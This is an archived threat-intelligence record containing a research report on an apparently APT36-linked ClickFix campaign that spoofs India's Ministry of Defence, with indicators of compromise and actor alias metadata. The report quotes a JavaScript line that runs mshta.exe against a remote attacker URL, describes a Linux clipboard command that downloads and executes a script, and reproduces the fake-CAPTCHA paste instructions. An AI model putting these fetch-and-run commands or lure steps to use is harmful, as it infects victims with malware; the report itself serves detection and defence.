{
	"id": "252c3ae6-46ca-46fa-a30c-5fbc3ca22f70",
	"created_at": "2026-04-06T00:06:11.784835Z",
	"updated_at": "2026-04-10T03:36:50.338295Z",
	"deleted_at": null,
	"sha1_hash": "30563a73c58fbb3046b695ddfe2197be912f81cf",
	"title": "APT36-Linked ClickFix Campaign Spoofs Indian Ministry of Defence, Targets Windows \u0026 Linux Users",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 36387365,
	"plain_text": "APT36-Linked ClickFix Campaign Spoofs Indian Ministry of\r\nDefence, Targets Windows \u0026 Linux Users\r\nPublished: 2025-05-05 · Archived: 2026-04-05 13:20:28 UTC\r\nTABLE OF CONTENTS\r\nInitial Landing Page: Fake Ministry Press Release PortalClickFix Technique ObservationsFinal thoughts\r\nThreat actors continue to adopt recognizable branding and official imagery to lower suspicion and facilitate\r\nmalware execution. Infrastructure spoofing India's Ministry of Defence was recently observed delivering cross-platform malware through a ClickFix-style infection chain. The site mimicked government press releases, staged\r\npayloads through a possibly compromised .in domain, and used visual deception to appear credible during\r\nexecution.\r\nThis activity mirrors patterns seen in other ClickFix cases-reuse of public-sector branding, staging malware in\r\nweb asset directories, and targeting Windows and Linux to maximize effectiveness.\r\nInitial Landing Page: Fake Ministry Press Release Portal\r\nWhile surveying domains imitating official government websites, Hunt.io identified\r\nemail.gov.in.drdosurvey[.]info serving content spoofing India's Ministry of Defence. Visiting the site in a browser\r\nopened a page mimicking the Ministry's official press release archive, with structure and layout closely modeled\r\non the legitimate portal.\r\nA comparison of the URL paths is below:\r\nLegitimate: /index.php/en/press-releases-ministry-defence-0\\\r\nMalicious: /content/press-releases-ministry-defence-0.html\r\n \r\nCopy\r\nThe threat actor(s) attempted to recreate the Ministry's public document archive, typically listing monthly press\r\nreleases from September 2023 through April 2025. However, on the cloned page, only a single link-corresponding\r\nto March 2025-was active, while all other months displayed a static \"No Data\" status.\r\nhttps://hunt.io/blog/apt36-clickfix-campaign-indian-ministry-of-defence\r\nPage 1 of 9\n\nFigure 1: Page screenshot showing only March 2025 link.\r\nReviewing the cloned portal's source code revealed that the page had been created using HTTrack, a publicly\r\navailable website copying tool. Metadata embedded within the HTML suggested the cloning occurred in early\r\nMarch 2025.\r\nFigure 2: Source code snippet showing HTTrack metadata\r\nThreat actors attempted to recreate the Ministry's public document archive, typically listing monthly press releases\r\nfrom September 2023 through April 2025. However, on the cloned portal, only a single link-corresponding to\r\nMarch 2025-was active, while all other months displayed a static \"No Data\" status.\r\nClickFix Technique Observations\r\nhttps://hunt.io/blog/apt36-clickfix-campaign-indian-ministry-of-defence\r\nPage 2 of 9\n\nClicking the only active link on the cloned press release portal-labeled March 2025-initiates a ClickFix-style\r\nsocial engineering flow. The user is directed to one of two PHP pages depending on their operating system:\r\nWindows: /captcha/windows.php\r\nLinux: /captcha/linux.php\r\n \r\nCopy\r\nThis section focuses on the Linux-specific flow, which appears less mature and may still be under development.\r\nLinux Flow: CAPTCHA Lure and Shell Command Execution\r\nThe Linux CAPTCHA page presents a minimal interface with a single blue button labeled, \"I'm not a rebot\"-a\r\nmisspelling possibly either a typo or introduced intentionally to avoid automated scanning for similar web pages.\r\nFigure 3: CAPTCHA page showing \"I'm not a rebot\" button\r\nUpon clicking the button, a shell command is silently copied to the user's clipboard. If pasted and executed in a\r\nterminal, the command downloads a shell script named mapeal.sh from\r\nhttps://trade4wealth[.]in/admin/assets/js/ , grants it execute permissions via chmod +x, and then runs it\r\nimmediately. The domain used for payload delivery- trade4wealth[.]in -is assessed as a likely compromised or\r\nabandoned asset, repurposed as part of the delivery infrastructure.\r\nImmediately after copying the payload command, the user is redirected to linux-guide.php , which displays a\r\nverification overlay and a set of instructions:\r\nhttps://hunt.io/blog/apt36-clickfix-campaign-indian-ministry-of-defence\r\nPage 3 of 9\n\n1. Press ALT + F2\r\n2. Press CTRL + V\r\n3. Press Enter\r\n \r\nCopy\r\nFigure 4: linux-guide.php showing fake CAPTCHA and \"Verificaton Steps\"\r\nThe page presents the next phase of the ClickFix flow: a spoofed CAPTCHA overlay paired with step-by-step\r\ninstructions designed to trick users into executing clipboard-based shell commands.\r\nBehind the overlay, the background appears to be a static image containing a faint watermark from PCRisk, a\r\nlegitimate cybersecurity information site that publishes malware removal guides and threat analysis. The inclusion\r\nof this image may be intended to mimic the appearance of a trusted security interface and reduce suspicion during\r\nexecution.\r\nAs of this writing, the Linux payload ( mapeal.sh ) performs no observable malicious behavior. The script\r\ndownloads a JPEG image from the same trade4wealth[.]in directory and opens it in the background. No\r\nadditional activity, such as persistence mechanisms, lateral movement, or outbound communication, was observed\r\nduring execution.\r\nWindows Flow: FOUO Warning and mshta-Based Payload Delivery\r\nOn Windows systems, clicking the March 2025 link redirects the user to /captcha/windows.php , which displays\r\na full-screen overlay mimicking a government-style disclosure warning labeled \"For Official Use Only\r\nhttps://hunt.io/blog/apt36-clickfix-campaign-indian-ministry-of-defence\r\nPage 4 of 9\n\n(FOUO).\" The background image appears to be a blurred capture of the official yoga.ayush.gov[.]in portal, a\r\nlegitimate website operated by India's Ministry of AYUSH to promote yoga and wellness programs.\r\nFigure 5: windows.php page with FOUO warning and blurred AYUSH site in the background.\r\nAfter clicking the Continue button, the user is served a second-stage ClickFix sequence. A JavaScript function\r\nsilently copies a malicious command to the clipboard, instructing the user to paste and execute it in the terminal.\r\nThe payload is executed via mshta.exe, invoking a remote script hosted on the attacker-controlled infrastructure:\r\nconst calcPath = \"C:\\\\Windows\\\\System32\\\\mshta.exe https://trade4wealth[.]in/admin/assets/css/default/index.php\"; navigato\r\n \r\nCopy\r\nhttps://hunt.io/blog/apt36-clickfix-campaign-indian-ministry-of-defence\r\nPage 5 of 9\n\nFigure 6: JavaScript source showing mshta.exe payload and clipboard copy logic.\r\nWhen accessed directly, index.php redirects to a second-stage payload at:\r\nhttps://trade4wealth[.]in/admin/assets/css/default/sysinte.hta\r\n \r\nCopy\r\nThis HTA file contains hundreds of lines of obfuscated JavaScript using hexadecimal escape sequences, designed\r\nto hinder static analysis.\r\nFigure 7: Snippet of sysinte.hta.\r\nhttps://hunt.io/blog/apt36-clickfix-campaign-indian-ministry-of-defence\r\nPage 6 of 9\n\nDynamic analysis of the decoded payload revealed a .NET-based loader, which initiates outbound connections to\r\nthe IP address 185.117.90[.]212 . This host also resolves to a spoofed subdomain:\r\nemail.gov.in.avtzyu[.]store .\r\nWhile the malware executes in the background, the user is shown a decoy document-an apparently legitimate\r\npress release themed around the Indian Ministry of Defence. The PDF appears to have been cloned directly from\r\nthe actual press release portal, likely intended to reinforce the illusion of legitimacy.\r\nFigure 8: Decoy PDF shown to the victim during malware execution.\r\nOperator Traits and Attribution\r\nSeveral observable traits across this campaign can help defenders identify related malicious infrastructure and\r\nanticipate future staging activity:\r\nDomains mimicking Indian government subdomains, particularly variations of email.gov[.]in ,\r\nappended to attacker-controlled parent domains (e.g., drdosurvey[.]info , avtzyu[.]store ).\r\nUse of Namecheap as a registrar, and registrar-servers[.]com nameservers-both commonly abused in\r\nmalicious activity.\r\nHTA payloads staged deep in URL paths masquerading as benign directories.\r\nSpelling anomalies, such as \"I'm not a rebot\" and \"officia use only\", may reflect a deliberate attempt to\r\nbypass pattern-based detection or user familiarity.\r\nhttps://hunt.io/blog/apt36-clickfix-campaign-indian-ministry-of-defence\r\nPage 7 of 9\n\nCross-platform delivery using clipboard-based execution on both Windows (mshta.exe) and Linux (curl +\r\nchmod + bash) further supports staging flexibility.\r\nAttribution Assessment\r\nWhile attribution remains unconfirmed, the tradecraft observed in this campaign-use of government-themed lure\r\ncontent, HTA-based delivery, decoy documents, and operational targeting of Indian government infrastructure-is\r\nconsistent with historic activity attributed to APT36 (also known as Transparent Tribe).\r\nAPT36 is a Pakistan-aligned threat actor known for:\r\nLongstanding focus on Indian government, military, and diplomatic targets.\r\nRepeated use of .NET-based malware, HTA delivery, and cloned login or press release content.\r\nInfrastructure that frequently includes typosquatting, misuse of legitimate services, and publicly visible\r\nscripting errors.\r\nBased on these overlaps, this activity is assessed with medium confidence to align with APT36's broader targeting\r\nand operational patterns.\r\nFinal thoughts\r\nThis campaign reflects a familiar playbook with subtle adjustments: cloned government branding, decoy files, and\r\nlow-friction execution paths tailored to each operating system. While not technically advanced, the operators\r\nshowed clear intent in crafting believable lures and maintaining control over payload delivery across different\r\nplatforms.\r\nThe inclusion of press release theming, clipboard-based execution, and reused security imagery fits a pattern seen\r\nin prior APT36 activity. If not definitive, it's a strong indication that known actors are continuing to test ClickFix-style techniques in new contexts.\r\nFor defenders, the takeaway isn't tied to a single technique-it's the way familiar methods are being reused in\r\nslightly new combinations. Look for signs like clipboard-delivered commands, spoofed government subdomains,\r\nshallow clones of trusted sites, and payloads staged under common web folders. These small patterns, when seen\r\ntogether, often reveal a larger campaign taking shape. We've observed similar patterns in our previous research on\r\nClickFix infrastructure, where early-stage domains showed many of the same traits.\r\nAPT36-Like Infrastructure Network Observables and Indicators of Compromise (IOCs)\r\nIP Address Domain(s) Hosting Company Location\r\n192.64.118[.]76 email[.]gov[.]in[.]drdosurvey[.]info\r\nNamecheap, Inc. (contains parked\r\ndomains)\r\nUS\r\n185.117.90[.]212 email[.]gov[.]in[.]avtzyu[.]store HZ Hosting Ltd NL\r\nhttps://hunt.io/blog/apt36-clickfix-campaign-indian-ministry-of-defence\r\nPage 8 of 9\n\nAPT36-Like Infrastructure Host Observables and Indicators of Compromise (IOCs)\r\nFilename SHA-256 Misc.\r\nsysinte.hta 7087e5f768acaad83550e6b1b9696477089d2797e8f6e3f9a9d69c77177d030e\r\nHTA file\r\nassociated with\r\nthe Windows\r\nClickFix\r\ntechnique.\r\nSource: https://hunt.io/blog/apt36-clickfix-campaign-indian-ministry-of-defence\r\nhttps://hunt.io/blog/apt36-clickfix-campaign-indian-ministry-of-defence\r\nPage 9 of 9",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://hunt.io/blog/apt36-clickfix-campaign-indian-ministry-of-defence"
	],
	"report_names": [
		"apt36-clickfix-campaign-indian-ministry-of-defence"
	],
	"threat_actors": [
		{
			"id": "414d7c65-5872-4e56-8a7d-49a2aeef1632",
			"created_at": "2025-08-07T02:03:24.7983Z",
			"updated_at": "2026-04-10T02:00:03.76109Z",
			"deleted_at": null,
			"main_name": "COPPER FIELDSTONE",
			"aliases": [
				"APT36 ",
				"Earth Karkaddan ",
				"Gorgon Group ",
				"Green Havildar ",
				"Mythic Leopard ",
				"Operation C-Major ",
				"Operation Transparent Tribe ",
				"Pasty Draco ",
				"ProjectM ",
				"Storm-0156 "
			],
			"source_name": "Secureworks:COPPER FIELDSTONE",
			"tools": [
				"CapraRAT",
				"Crimson RAT",
				"DarkComet",
				"ElizaRAT",
				"LuminosityLink",
				"ObliqueRAT",
				"Peppy",
				"njRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "fce5181c-7aab-400f-bd03-9db9e791da04",
			"created_at": "2022-10-25T15:50:23.759799Z",
			"updated_at": "2026-04-10T02:00:05.3002Z",
			"deleted_at": null,
			"main_name": "Transparent Tribe",
			"aliases": [
				"Transparent Tribe",
				"COPPER FIELDSTONE",
				"APT36",
				"Mythic Leopard",
				"ProjectM"
			],
			"source_name": "MITRE:Transparent Tribe",
			"tools": [
				"DarkComet",
				"ObliqueRAT",
				"njRAT",
				"Peppy"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "abb24b7b-6baa-4070-9a2b-aa59091097d1",
			"created_at": "2022-10-25T16:07:24.339942Z",
			"updated_at": "2026-04-10T02:00:04.944806Z",
			"deleted_at": null,
			"main_name": "Transparent Tribe",
			"aliases": [
				"APT 36",
				"APT-C-56",
				"Copper Fieldstone",
				"Earth Karkaddan",
				"G0134",
				"Green Havildar",
				"Mythic Leopard",
				"Opaque Draco",
				"Operation C-Major",
				"Operation Honey Trap",
				"Operation Transparent Tribe",
				"ProjectM",
				"STEPPY-KAVACH",
				"Storm-0156",
				"TEMP.Lapis",
				"Transparent Tribe"
			],
			"source_name": "ETDA:Transparent Tribe",
			"tools": [
				"Amphibeon",
				"Android RAT",
				"Bezigate",
				"Bladabindi",
				"Bozok",
				"Bozok RAT",
				"BreachRAT",
				"Breut",
				"CapraRAT",
				"CinaRAT",
				"Crimson RAT",
				"DarkComet",
				"DarkKomet",
				"ElizaRAT",
				"FYNLOS",
				"Fynloski",
				"Jorik",
				"Krademok",
				"Limepad",
				"Luminosity RAT",
				"LuminosityLink",
				"MSIL",
				"MSIL/Crimson",
				"Mobzsar",
				"MumbaiDown",
				"Oblique RAT",
				"ObliqueRAT",
				"Peppy RAT",
				"Peppy Trojan",
				"Quasar RAT",
				"QuasarRAT",
				"SEEDOOR",
				"Scarimson",
				"SilentCMD",
				"Stealth Mango",
				"UPDATESEE",
				"USBWorm",
				"Waizsar RAT",
				"Yggdrasil",
				"beendoor",
				"klovbot",
				"njRAT"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "c68fa27f-e8d9-4932-856b-467ccfe39997",
			"created_at": "2023-01-06T13:46:38.450585Z",
			"updated_at": "2026-04-10T02:00:02.980334Z",
			"deleted_at": null,
			"main_name": "Operation C-Major",
			"aliases": [
				"APT36",
				"APT 36",
				"TMP.Lapis",
				"COPPER FIELDSTONE",
				"Storm-0156",
				"Transparent Tribe",
				"ProjectM",
				"Green Havildar",
				"Earth Karkaddan",
				"C-Major",
				"Mythic Leopard"
			],
			"source_name": "MISPGALAXY:Operation C-Major",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775433971,
	"ts_updated_at": 1775792210,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/30563a73c58fbb3046b695ddfe2197be912f81cf.pdf",
		"text": "https://archive.orkl.eu/30563a73c58fbb3046b695ddfe2197be912f81cf.txt",
		"img": "https://archive.orkl.eu/30563a73c58fbb3046b695ddfe2197be912f81cf.jpg"
	}
}